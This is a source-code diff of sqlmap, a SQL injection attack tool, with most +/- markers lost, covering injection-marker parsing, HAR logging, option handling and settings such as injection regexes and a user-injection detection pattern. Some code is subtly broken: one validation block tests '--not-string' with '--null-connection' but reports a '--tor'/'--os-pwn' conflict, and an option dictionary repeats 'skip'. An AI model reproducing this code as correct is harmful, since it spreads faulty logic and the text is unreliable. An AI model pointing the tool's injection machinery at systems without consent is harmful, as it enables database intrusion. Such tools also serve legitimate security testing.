testableParameters[parameter] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), (r"\g<1>%s" % re.sub(regex, r"\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter])).replace("\\", r"\\"), parameters)
break

if conf.testParameter:

@@ -1118,6 +1118,13 @@ def sanitizeStr(value):
return getUnicode(value).replace("\n", " ").replace("\r", "")

def getHeader(headers, key):
"""
Returns header value ignoring the letter case

>>> getHeader({"Foo": "bar"}, "foo")
'bar'
"""

retVal = None
for _ in (headers or {}):
if _.upper() == key.upper():

@@ -1132,6 +1139,9 @@ def checkFile(filename, raiseOnError=True):
valid = True

if filename:
filename = filename.strip('"\'')

try:
if filename is None or not os.path.isfile(filename):
valid = False

@@ -1196,8 +1206,7 @@ def cleanQuery(query):
for sqlStatements in SQL_STATEMENTS.values():
for sqlStatement in sqlStatements:
sqlStatementEsc = sqlStatement.replace("(", "\\(")
queryMatch = re.search("(%s)" % sqlStatementEsc, query, re.I)
queryMatch = re.search("(?i)\b(%s)\b" % sqlStatement.replace("(", "").replace(")", "").strip(), query)

if queryMatch and "sys_exec" not in query:
retVal = retVal.replace(queryMatch.group(1), sqlStatement.upper())

@@ -1273,6 +1282,8 @@ def parseTargetDirect():
if not conf.direct:
return

conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters

details = None
remote = False

@@ -1289,8 +1300,8 @@ def parseTargetDirect():
if conf.dbmsCred:
conf.dbmsUser, conf.dbmsPass = conf.dbmsCred.split(':')
else:
conf.dbmsUser = unicode()
conf.dbmsPass = unicode()
conf.dbmsUser = ""
conf.dbmsPass = ""

if not conf.dbmsPass:
conf.dbmsPass = None

@@ -1386,7 +1397,7 @@ def parseTargetUrl():
else:
conf.url = "http://" + conf.url

if CUSTOM_INJECTION_MARK_CHAR in conf.url:
if kb.customInjectionMark in conf.url:
conf.url = conf.url.replace('?', URI_QUESTION_MARKER)

try:

@@ -1404,7 +1415,7 @@ def parseTargetUrl():
conf.hostname = hostnamePort[0].strip()

conf.ipv6 = conf.hostname != conf.hostname.strip("[]")
conf.hostname = conf.hostname.strip("[]").replace(CUSTOM_INJECTION_MARK_CHAR, "")
conf.hostname = conf.hostname.strip("[]").replace(kb.customInjectionMark, "")

try:
_ = conf.hostname.encode("idna")

@@ -1428,7 +1439,7 @@ def parseTargetUrl():
else:
conf.port = 80

if conf.port < 0 or conf.port > 65535:
if conf.port < 1 or conf.port > 65535:
errMsg = "invalid target URL's port (%d)" % conf.port
raise SqlmapSyntaxException(errMsg)

@@ -1445,7 +1456,7 @@ def parseTargetUrl():
debugMsg = "setting the HTTP Referer header to the target URL"
logger.debug(debugMsg)
conf.httpHeaders = [_ for _ in conf.httpHeaders if _[0] != HTTP_HEADER.REFERER]
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(CUSTOM_INJECTION_MARK_CHAR, "")))
conf.httpHeaders.append((HTTP_HEADER.REFERER, conf.url.replace(kb.customInjectionMark, "")))

if not conf.host and (intersect(HOST_ALIASES, conf.testParameter, True) or conf.level >= 5):
debugMsg = "setting the HTTP Host header to the target URL"

@@ -1507,16 +1518,25 @@ def getLimitRange(count, plusOne=False):
retVal = None
count = int(count)
limitStart, limitStop = 1, count
reverse = False

if kb.dumpTable:
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
limitStop = conf.limitStop
if conf.limitStart and conf.limitStop and conf.limitStart > conf.limitStop:
limitStop = conf.limitStart
limitStart = conf.limitStop
reverse = True
else:
if isinstance(conf.limitStop, int) and conf.limitStop > 0 and conf.limitStop < limitStop:
limitStop = conf.limitStop

if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
limitStart = conf.limitStart
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and conf.limitStart <= limitStop:
limitStart = conf.limitStart

retVal = xrange(limitStart, limitStop + 1) if plusOne else xrange(limitStart - 1, limitStop)

if reverse:
retVal = xrange(retVal[-1], retVal[0] - 1, -1)

return retVal

def parseUnionPage(page):
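The reversed-range branch added to getLimitRange() above (swap the bounds and remember to reverse when --start is larger than --stop during a table dump) can be sanity-checked with a small standalone sketch; the function below is a simplified stand-in, not the sqlmap implementation itself:

    # Simplified trace of the reversed-range logic (plain Python; list/range instead of xrange)
    def limit_range(count, limit_start=None, limit_stop=None, dumping=True):
        start, stop, reverse = 1, count, False
        if dumping and limit_start and limit_stop and limit_start > limit_stop:
            start, stop, reverse = limit_stop, limit_start, True  # swapped bounds, reversed order
        else:
            if limit_stop and 0 < limit_stop < stop:
                stop = limit_stop
            if limit_start and 0 < limit_start <= stop:
                start = limit_start
        rows = list(range(start - 1, stop))    # zero-based row indices
        return rows[::-1] if reverse else rows

    print(limit_range(10, limit_start=7, limit_stop=3))  # [6, 5, 4, 3, 2] -> rows 7..3, highest index first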
@@ -1618,6 +1638,13 @@ def getRemoteIP():
return retVal

def getFileType(filePath):
"""
Returns "magic" file type for given file path

>>> getFileType(__file__)
'text'
"""

try:
_ = magic.from_file(filePath)
except:

@@ -1970,7 +1997,7 @@ def getSQLSnippet(dbms, sfile, **variables):
retVal = re.sub(r";\s+", "; ", retVal).strip("\r\n")

for _ in variables.keys():
retVal = re.sub(r"%%%s%%" % _, variables[_], retVal)
retVal = re.sub(r"%%%s%%" % _, variables[_].replace('\\', r'\\'), retVal)

for _ in re.findall(r"%RANDSTR\d+%", retVal, re.I):
retVal = retVal.replace(_, randomStr())

@@ -2097,6 +2124,9 @@ def getFileItems(filename, commentPrefix='#', unicode_=True, lowercase=False, un
retVal = list() if not unique else OrderedDict()

if filename:
filename = filename.strip('"\'')

checkFile(filename)

try:

@@ -2544,7 +2574,7 @@ def urlencode(value, safe="%&=-_", convall=False, limit=False, spaceplus=False):
# corner case when character % really needs to be
# encoded (when not representing URL encoded char)
# except in cases when tampering scripts are used
if all(map(lambda x: '%' in x, [safe, value])) and not kb.tamperFunctions:
if all('%' in _ for _ in (safe, value)) and not kb.tamperFunctions:
value = re.sub("%(?![0-9a-fA-F]{2})", "%25", value)

while True:

@@ -2596,18 +2626,19 @@ def runningAsAdmin():
return isAdmin

def logHTTPTraffic(requestLogMsg, responseLogMsg):
def logHTTPTraffic(requestLogMsg, responseLogMsg, startTime=None, endTime=None):
"""
Logs HTTP traffic to the output file
"""

if not conf.trafficFile:
return
if conf.harFile:
conf.httpCollector.collectRequest(requestLogMsg, responseLogMsg, startTime, endTime)

with kb.locks.log:
dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep))
dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep))
dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep))
if conf.trafficFile:
with kb.locks.log:
dataToTrafficFile("%s%s" % (requestLogMsg, os.linesep))
dataToTrafficFile("%s%s" % (responseLogMsg, os.linesep))
dataToTrafficFile("%s%s%s%s" % (os.linesep, 76 * '#', os.linesep, os.linesep))

def getPageTemplate(payload, place): # Cross-linked function
raise NotImplementedError

@@ -3176,13 +3207,13 @@ def decodeIntToUnicode(value):
if Backend.isDbms(DBMS.MYSQL):
# https://github.com/sqlmapproject/sqlmap/issues/1531
retVal = getUnicode(raw, conf.charset or UNICODE_ENCODING)
retVal = getUnicode(raw, conf.encoding or UNICODE_ENCODING)
elif Backend.isDbms(DBMS.MSSQL):
retVal = getUnicode(raw, "UTF-16-BE")
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE):
retVal = unichr(value)
else:
retVal = getUnicode(raw, conf.charset)
retVal = getUnicode(raw, conf.encoding)
else:
retVal = getUnicode(chr(value))
except:

@@ -3533,11 +3564,11 @@ def safeSQLIdentificatorNaming(name, isTable=False):
if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
retVal = "`%s`" % retVal.strip("`")
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.INFORMIX, DBMS.HSQLDB):
retVal = "\"%s\"" % retVal.strip("\"")
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
retVal = "\"%s\"" % retVal.strip("\"").upper()
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and ((retVal or " ")[0].isdigit() or not re.match(r"\A\w+\Z", retVal, re.U)):
retVal = "[%s]" % retVal.strip("[]")

if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):

@@ -3555,11 +3586,11 @@ def unsafeSQLIdentificatorNaming(name):
if isinstance(name, basestring):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
retVal = name.replace("`", "")
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2, DBMS.SQLITE, DBMS.INFORMIX, DBMS.HSQLDB):
retVal = name.replace("\"", "")
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
retVal = name.replace("\"", "").upper()
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,):
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
retVal = name.replace("[", "").replace("]", "")

if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):

@@ -4385,6 +4416,9 @@ def getSafeExString(ex, encoding=None):
"""
Safe way how to get the proper exception represtation as a string
(Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161'))

>>> getSafeExString(Exception('foobar'))
u'foobar'
"""

retVal = ex

@@ -4394,4 +4428,4 @@ def getSafeExString(ex, encoding=None):
elif getattr(ex, "msg", None):
retVal = ex.msg

return getUnicode(retVal, encoding=encoding)
return getUnicode(retVal or "", encoding=encoding).strip()
@@ -110,7 +110,7 @@ def hexdecode(value):
|
||||
value = value.lower()
|
||||
return (value[2:] if value.startswith("0x") else value).decode("hex")
|
||||
|
||||
def hexencode(value):
|
||||
def hexencode(value, encoding=None):
|
||||
"""
|
||||
Encodes string value from plain to hex format
|
||||
|
||||
@@ -118,7 +118,7 @@ def hexencode(value):
|
||||
'666f6f626172'
|
||||
"""
|
||||
|
||||
return utf8encode(value).encode("hex")
|
||||
return unicodeencode(value, encoding).encode("hex")
|
||||
|
||||
def unicodeencode(value, encoding=None):
|
||||
"""
|
||||
|
||||
@@ -272,6 +272,7 @@ DEPRECATED_OPTIONS = {
|
||||
"--no-unescape": "use '--no-escape' instead",
|
||||
"--binary": "use '--binary-fields' instead",
|
||||
"--auth-private": "use '--auth-file' instead",
|
||||
"--ignore-401": "use '--ignore-code' instead",
|
||||
"--check-payload": None,
|
||||
"--check-waf": None,
|
||||
"--pickled-options": "use '--api -c ...' instead",
|
||||
|
||||
@@ -184,6 +184,7 @@ class HTTP_HEADER:
|
||||
USER_AGENT = "User-Agent"
|
||||
VIA = "Via"
|
||||
X_POWERED_BY = "X-Powered-By"
|
||||
X_DATA_ORIGIN = "X-Data-Origin"
|
||||
|
||||
class EXPECTED:
|
||||
BOOL = "bool"
|
||||
@@ -369,6 +370,7 @@ class MKSTEMP_PREFIX:
|
||||
RESULTS = "sqlmapresults-"
|
||||
COOKIE_JAR = "sqlmapcookiejar-"
|
||||
BIG_ARRAY = "sqlmapbigarray-"
|
||||
SPECIFIC_RESPONSE = "sqlmapresponse-"
|
||||
|
||||
class TIMEOUT_STATE:
|
||||
NORMAL = 0
|
||||
|
||||
@@ -50,6 +50,9 @@ class SqlmapUserQuitException(SqlmapBaseException):
|
||||
class SqlmapShellQuitException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapSkipTargetException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
class SqlmapSyntaxException(SqlmapBaseException):
|
||||
pass
|
||||
|
||||
|
||||
@@ -110,7 +110,7 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING
|
||||
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
|
||||
from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS
|
||||
from lib.core.settings import DUMMY_URL
|
||||
from lib.core.settings import INJECT_HERE_MARK
|
||||
from lib.core.settings import INJECT_HERE_REGEX
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
|
||||
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
|
||||
@@ -149,6 +149,7 @@ from lib.request.pkihandler import HTTPSPKIAuthHandler
|
||||
from lib.request.rangehandler import HTTPRangeHandler
|
||||
from lib.request.redirecthandler import SmartRedirectHandler
|
||||
from lib.request.templates import getPageTemplate
|
||||
from lib.utils.har import HTTPCollectorFactory
|
||||
from lib.utils.crawler import crawl
|
||||
from lib.utils.deps import checkDependencies
|
||||
from lib.utils.search import search
|
||||
@@ -232,7 +233,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S)
|
||||
|
||||
for match in reqResList:
|
||||
request = match if isinstance(match, basestring) else match.group(1)
|
||||
request = match if isinstance(match, basestring) else match.group(0)
|
||||
request = re.sub(r"\A[^\w]+", "", request)
|
||||
|
||||
schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S)
|
||||
@@ -240,6 +241,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
if schemePort:
|
||||
scheme = schemePort.group(1)
|
||||
port = schemePort.group(2)
|
||||
request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip())
|
||||
else:
|
||||
scheme, port = None, None
|
||||
|
||||
@@ -278,7 +280,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
method = match.group(1)
|
||||
url = match.group(2)
|
||||
|
||||
if any(_ in line for _ in ('?', '=', CUSTOM_INJECTION_MARK_CHAR)):
|
||||
if any(_ in line for _ in ('?', '=', kb.customInjectionMark)):
|
||||
params = True
|
||||
|
||||
getPostReq = True
|
||||
@@ -318,7 +320,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
|
||||
elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
|
||||
headers.append((getUnicode(key), getUnicode(value)))
|
||||
|
||||
if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
||||
if kb.customInjectionMark in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
|
||||
params = True
|
||||
|
||||
data = data.rstrip("\r\n") if data else data
|
||||
@@ -484,7 +486,7 @@ def _setRequestFromFile():
|
||||
conf.requestFile = safeExpandUser(conf.requestFile)
|
||||
|
||||
if not os.path.isfile(conf.requestFile):
|
||||
errMsg = "the specified HTTP request file "
|
||||
errMsg = "specified HTTP request file '%s' " % conf.requestFile
|
||||
errMsg += "does not exist"
|
||||
raise SqlmapFilePathException(errMsg)
|
||||
|
||||
@@ -591,7 +593,7 @@ def _setBulkMultipleTargets():
|
||||
|
||||
found = False
|
||||
for line in getFileItems(conf.bulkFile):
|
||||
if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
|
||||
if re.match(r"[^ ]+\?(.+)", line, re.I) or kb.customInjectionMark in line:
|
||||
found = True
|
||||
kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None))
|
||||
|
||||
@@ -627,7 +629,7 @@ def _findPageForms():
|
||||
logger.info(infoMsg)
|
||||
|
||||
if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)):
|
||||
page, _ = Request.queryPage(content=True)
|
||||
page, _, _ = Request.queryPage(content=True)
|
||||
findPageForms(page, conf.url, True, True)
|
||||
else:
|
||||
if conf.bulkFile:
|
||||
@@ -1407,8 +1409,8 @@ def _setHTTPExtraHeaders():
|
||||
raise SqlmapSyntaxException(errMsg)
|
||||
|
||||
elif not conf.requestFile and len(conf.httpHeaders or []) < 2:
|
||||
if conf.charset:
|
||||
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset))
|
||||
if conf.encoding:
|
||||
conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.encoding))
|
||||
|
||||
# Invalidating any caching mechanism in between
|
||||
# Reference: http://stackoverflow.com/a/1383359
|
||||
@@ -1683,17 +1685,28 @@ def _cleanupOptions():
|
||||
if conf.optimize:
|
||||
setOptimize()
|
||||
|
||||
if conf.data:
|
||||
conf.data = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data)
|
||||
match = re.search(INJECT_HERE_REGEX, conf.data or "")
|
||||
if match:
|
||||
kb.customInjectionMark = match.group(0)
|
||||
|
||||
if conf.url:
|
||||
conf.url = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url)
|
||||
match = re.search(INJECT_HERE_REGEX, conf.url or "")
|
||||
if match:
|
||||
kb.customInjectionMark = match.group(0)
|
||||
|
||||
if conf.os:
|
||||
conf.os = conf.os.capitalize()
|
||||
|
||||
if conf.forceDbms:
|
||||
conf.dbms = conf.forceDbms
|
||||
|
||||
if conf.dbms:
|
||||
conf.dbms = conf.dbms.capitalize()
|
||||
kb.dbmsFilter = []
|
for _ in conf.dbms.split(','):
for dbms, aliases in DBMS_ALIASES:
if _.strip().lower() in aliases:
kb.dbmsFilter.append(dbms)
conf.dbms = dbms if conf.dbms and ',' not in conf.dbms else None
break

if conf.testFilter:
conf.testFilter = conf.testFilter.strip('*+')
@@ -1828,6 +1841,7 @@ def _setConfAttributes():
conf.dumpPath = None
conf.hashDB = None
conf.hashDBFile = None
conf.httpCollector = None
conf.httpHeaders = []
conf.hostname = None
conf.ipv6 = False
@@ -1843,6 +1857,7 @@ def _setConfAttributes():
conf.scheme = None
conf.tests = []
conf.trafficFP = None
conf.HARCollectorFactory = None
conf.wFileType = None

def _setKnowledgeBaseAttributes(flushAll=True):
@@ -1862,6 +1877,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.authHeader = None
kb.bannerFp = AttribDict()
kb.binaryField = False
kb.browserVerification = None

kb.brute = AttribDict({"tables": [], "columns": []})
kb.bruteMode = False
@@ -1889,11 +1905,13 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.connErrorCounter = 0
kb.cookieEncodeChoice = None
kb.counters = {}
kb.customInjectionMark = CUSTOM_INJECTION_MARK_CHAR
kb.data = AttribDict()
kb.dataOutputFlag = False

# Active back-end DBMS fingerprint
kb.dbms = None
kb.dbmsFilter = []
kb.dbmsVersion = [UNKNOWN_DBMS_VERSION]

kb.delayCandidates = TIME_DELAY_CANDIDATES * [0]
@@ -1901,6 +1919,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.dnsMode = False
kb.dnsTest = None
kb.docRoot = None
kb.droppingRequests = False
kb.dumpColumns = None
kb.dumpTable = None
kb.dumpKeyboardInterrupt = False
@@ -1920,6 +1939,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.futileUnion = None
kb.headersFp = {}
kb.heuristicDbms = None
kb.heuristicExtendedDbms = None
kb.heuristicMode = False
kb.heuristicPage = False
kb.heuristicTest = None
@@ -2009,6 +2029,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.tableExistsChoice = None
kb.uChar = NULL
kb.unionDuplicates = False
kb.wafSpecificResponse = None
kb.xpCmdshellAvailable = False

if flushAll:
@@ -2224,6 +2245,12 @@ def _setTrafficOutputFP():

conf.trafficFP = openFile(conf.trafficFile, "w+")

def _setupHTTPCollector():
if not conf.harFile:
return

conf.httpCollector = HTTPCollectorFactory(conf.harFile).create()

def _setDNSServer():
if not conf.dnsDomain:
return
@@ -2353,8 +2380,8 @@ def _basicOptionValidation():

if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option"
raise SqlmapSyntaxException(errMsg)
warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable"
logger.warn(warnMsg)

if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
@@ -2401,6 +2428,10 @@ def _basicOptionValidation():
errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
raise SqlmapSyntaxException(errMsg)

if conf.notString and conf.nullConnection:
errMsg = "option '--tor' is incompatible with switch '--os-pwn'"
raise SqlmapSyntaxException(errMsg)

if conf.noCast and conf.hexConvert:
errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
raise SqlmapSyntaxException(errMsg)
@@ -2546,15 +2577,15 @@ def _basicOptionValidation():
errMsg += "format <username>:<password> (e.g. \"root:pass\")"
raise SqlmapSyntaxException(errMsg)

if conf.charset:
_ = checkCharEncoding(conf.charset, False)
if conf.encoding:
_ = checkCharEncoding(conf.encoding, False)
if _ is None:
errMsg = "unknown charset '%s'. Please visit " % conf.charset
errMsg = "unknown charset '%s'. Please visit " % conf.encoding
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
errMsg += "supported charsets"
raise SqlmapSyntaxException(errMsg)
else:
conf.charset = _
conf.encoding = _

if conf.loadCookies:
if not os.path.exists(conf.loadCookies):
@@ -2600,6 +2631,7 @@ def init():
_setTamperingFunctions()
_setWafFunctions()
_setTrafficOutputFP()
_setupHTTPCollector()
_resolveCrossReferences()
_checkWebSocket()


@@ -38,7 +38,7 @@ optDict = {
"authType": "string",
"authCred": "string",
"authFile": "string",
"ignore401": "boolean",
"ignoreCode": "integer",
"ignoreProxy": "boolean",
"ignoreRedirects": "boolean",
"ignoreTimeouts": "boolean",
@@ -77,8 +77,8 @@ optDict = {
"testParameter": "string",
"skip": "string",
"skipStatic": "boolean",
"skip": "string",
"paramExclude": "string",
"dbms": "string",
"dbmsCred": "string",
"os": "string",
"invalidBignum": "boolean",
@@ -196,14 +196,17 @@ optDict = {
"batch": "boolean",
"binaryFields": "string",
"charset": "string",
"checkInternet": "boolean",
"crawlDepth": "integer",
"crawlExclude": "string",
"csvDel": "string",
"dumpFormat": "string",
"encoding": "string",
"eta": "boolean",
"flushSession": "boolean",
"forms": "boolean",
"freshQueries": "boolean",
"harFile": "string",
"hexConvert": "boolean",
"outputDir": "string",
"parseErrors": "boolean",

@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS

# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
VERSION = "1.1.5.0"
VERSION = "1.1.10.0"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
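The version bump above also drives how the banner and release type are rendered. A minimal sketch (not part of the diff, using only the constants shown) of how TYPE and VERSION_STRING are derived from VERSION:

```python
# Sketch: derivation of the release type and banner string from VERSION
VERSION = "1.1.10.0"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)

print(TYPE)            # stable (a trailing ".0" marks a tagged monthly release)
print(VERSION_STRING)  # sqlmap/1.1.10#stable
```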
@@ -67,6 +67,7 @@ BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
RANDOM_INTEGER_MARKER = "[RANDINT]"
RANDOM_STRING_MARKER = "[RANDSTR]"
SLEEP_TIME_MARKER = "[SLEEPTIME]"
INFERENCE_MARKER = "[INFERENCE]"

PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
CHAR_INFERENCE_MARK = "%c"
@@ -175,6 +176,9 @@ INFERENCE_UNKNOWN_CHAR = '?'
# Character used for operation "greater" in inference
INFERENCE_GREATER_CHAR = ">"

# Character used for operation "greater or equal" in inference
INFERENCE_GREATER_EQUALS_CHAR = ">="

# Character used for operation "equals" in inference
INFERENCE_EQUALS_CHAR = "="

@@ -295,7 +299,7 @@ BLANK = "<blank>"
CURRENT_DB = "CD"

# Regular expressions used for finding file paths in error messages
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line \d+", r"in (?P<result>[^<>]+?) on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w. \\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")

# Regular expressions used for parsing error messages (--parse-errors)
ERROR_PARSING_REGEXES = (
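A minimal sketch (hypothetical error page, not part of the diff) of how the reworked FILE_PATH_REGEXES are meant to be applied - the first pattern that matches yields the absolute path leaked by the back-end:

```python
import re

# Only the first two (changed) patterns are reproduced here for brevity
FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"(?P<result>[^<>'\"]+?)['\"]? on line \d+")

page = "Warning: mysql_fetch_array() expects parameter 1 to be resource in <b>/var/www/html/index.php</b> on line 14"

for regex in FILE_PATH_REGEXES:
    match = re.search(regex, page)
    if match:
        print(match.group("result"))  # /var/www/html/index.php
        break
```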
@@ -366,7 +370,7 @@ CANDIDATE_SENTENCE_MIN_LENGTH = 10
CUSTOM_INJECTION_MARK_CHAR = '*'

# Other way to declare injection position
INJECT_HERE_MARK = '%INJECT HERE%'
INJECT_HERE_REGEX = '(?i)%INJECT[_ ]?HERE%'

# Minimum chunk length used for retrieving data over error based payloads
MIN_ERROR_CHUNK_LENGTH = 8
@@ -453,6 +457,9 @@ LOW_TEXT_PERCENT = 20
# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html
IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM")

# Keywords expected to be in UPPERCASE in getValue()
GET_VALUE_UPPERCASE_KEYWORDS = ("SELECT", "FROM", "WHERE", "DISTINCT", "COUNT")

LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"

# After this number of misses reflective removal mechanism is turned off (for speed up reasons)
@@ -475,7 +482,7 @@ DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\
# Extensions skipped by crawler
CRAWL_EXCLUDE_EXTENSIONS = ("3ds", "3g2", "3gp", "7z", "DS_Store", "a", "aac", "adp", "ai", "aif", "aiff", "apk", "ar", "asf", "au", "avi", "bak", "bin", "bk", "bmp", "btif", "bz2", "cab", "caf", "cgm", "cmx", "cpio", "cr2", "dat", "deb", "djvu", "dll", "dmg", "dmp", "dng", "doc", "docx", "dot", "dotx", "dra", "dsk", "dts", "dtshd", "dvb", "dwg", "dxf", "ear", "ecelp4800", "ecelp7470", "ecelp9600", "egg", "eol", "eot", "epub", "exe", "f4v", "fbs", "fh", "fla", "flac", "fli", "flv", "fpx", "fst", "fvt", "g3", "gif", "gz", "h261", "h263", "h264", "ico", "ief", "image", "img", "ipa", "iso", "jar", "jpeg", "jpg", "jpgv", "jpm", "jxr", "ktx", "lvp", "lz", "lzma", "lzo", "m3u", "m4a", "m4v", "mar", "mdi", "mid", "mj2", "mka", "mkv", "mmr", "mng", "mov", "movie", "mp3", "mp4", "mp4a", "mpeg", "mpg", "mpga", "mxu", "nef", "npx", "o", "oga", "ogg", "ogv", "otf", "pbm", "pcx", "pdf", "pea", "pgm", "pic", "png", "pnm", "ppm", "pps", "ppt", "pptx", "ps", "psd", "pya", "pyc", "pyo", "pyv", "qt", "rar", "ras", "raw", "rgb", "rip", "rlc", "rz", "s3m", "s7z", "scm", "scpt", "sgi", "shar", "sil", "smv", "so", "sub", "swf", "tar", "tbz2", "tga", "tgz", "tif", "tiff", "tlz", "ts", "ttf", "uvh", "uvi", "uvm", "uvp", "uvs", "uvu", "viv", "vob", "war", "wav", "wax", "wbmp", "wdp", "weba", "webm", "webp", "whl", "wm", "wma", "wmv", "wmx", "woff", "woff2", "wvx", "xbm", "xif", "xls", "xlsx", "xlt", 